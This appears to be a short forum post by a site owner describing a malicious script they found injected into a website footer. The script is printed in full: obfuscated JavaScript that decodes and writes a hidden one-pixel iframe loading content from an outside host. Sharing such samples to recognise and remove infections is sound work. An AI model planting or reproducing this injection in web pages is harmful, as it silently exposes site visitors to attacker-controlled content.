OK...this one didn't come from my site because I have already removed it and didn't save it, sorry. I think this is pretty much exactly what I had also though. I found this doing a search. I found it at the very end of my footer.
<script>var _0x110261= ["\x77\x72\x69\x74\x65"]; var aBBcB=document; var ccccc = '<iframJQ21KL#AZ XLMS9Q21rc="http%3A%2F%2Fimg121.imagehacks.info%2F img121%2F103%2Fheader.jpeg" width="1" hJQ21KL#AZight="0" framJQ21KL#AZbordJQ21KL#AZr="0"></iframJQ21KL#AZ>'; var BBBcB = ccccc.replace(/XLMS9Q21/g,"s"); var ccBBB = BBBcB.replace(/LSM21ghk8/g,"o"); var cBcBc = ccBBB.replace(/JQ21KL#AZ/g,"e");aBBcB[_0x110261[0]](unescape(cBcBc));</script>